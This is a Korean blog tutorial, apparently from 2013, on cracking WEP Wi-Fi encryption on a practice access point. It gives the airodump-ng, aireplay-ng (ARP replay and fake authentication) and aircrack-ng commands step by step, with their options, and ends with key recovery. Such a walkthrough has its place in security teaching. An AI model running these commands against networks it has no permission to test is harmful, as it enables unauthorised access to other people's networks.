본문 바로가기

Hacking/무선 해킹

WEP 크랙

WEP 프로토콜은 2000년에 이미 결점이 발견되었지만 여전히 사용 중이며 거의 모든 AP가 WEP 기능을 탑재하고 있다.

따라서 주변 AP를 스캔하고 그 중 WEP가 있다면 해당 네트워크의 내부에 접속이 가능할 수도 있도. WEP 크랙은 다음과 같이 진행된다.

 

 

 

1). 실습을 위해 AP를 다음과 같이 세팅

 

 

2. 무선랜카드를 모니터 모드로 만듬

 

 

 

 

 

3. 주변 AP를 스캔 및 스캔 결과를 저장

 

# airodump-ng mo0

주변 AP를 스캔하여 크랙할 AP를 찾음

 

# airodump-ng -c 9 --bssid 00-26-66-12-cc-9c -w WEPCrack mon0

위에서 얻은 AP 중 한 개를 골라서 각각의 채널 (9번)과 MAC주소 (00-26-66-~)를 설정하고,

      해당 AP를 스캔한 결과를 WEPCrack이라는 파일로 저장한다. (-w 옵션이 파일 저장 옵션)

 

 

 

 

 

4. 패킷 발생

3단계의 사진에서 보면 #Data라는 항목이 보이는데 이 항목이 매우 많아야 크랙이 가능하다. 따라서 공격자는 패킷을 대량으로

발생시켜야 하는데 여기에는 2가지 방법이 있다.

 

4-1). 이미 해당 AP와 통신 중인 MAC 주소를 이용하여 패킷 발생

# aireplay-ng -3 -b 00-26-66-12-cc-9c -h 0c-df-a4-a3-d3-40 mon0

-3 옵션 : ARP 패킷 발생 설정

-b 옵션 : 해당 AP의 MAC 주소

-h 옵션 : 패킷 발생 시 사용할 MAC 주소

 

 

 

4-2). 해당 AP와 통신중인 클라이언트가 없을 경우 가짜 인증 후 패킷 발생

# aireplay-ng -1 0 -a 00-26-66-12-cc-9c mon0

-1 옵션 : 가짜 인증 설정 (뒤에 숫자 0은, 재연결 시간)

-a 옵션 : 해당 AP의 MAC 주소

사진은 찍지 못하였지만 위의 과정을 거치면 3단계의 사진에서 본 #Data 값이 매우 빠르게 증가된다. (1분 진행 시 약 3,000개)

이를 이용하여 크랙을 한다.

 

 

 

5. WEP 크랙 시도

 

 

aircrack-ng 명령어를 이용하여 크랙을 시도한다. 사진에서 볼수 잇는 IVs 값이 많아야 크랙의 확률이 높아지기 때문에 위의 4번 과정을

거친 것이다. 아래에서 보듯이 "KEY FOUND! ~~~~~ ASCII : 1234567890123" 이라고 원본 키 값이 크랙된것을 볼 수 있다.

'Hacking > 무선 해킹' 카테고리의 다른 글

숨겨진 SSID 찾기  (0) 2013.12.24
패킷 인젝션  (0) 2013.12.16
데이터 패킷 스니핑  (0) 2013.12.16
무선 패킷 스니핑 및 프레임 분석  (0) 2013.12.16
모니터 모드  (0) 2013.12.16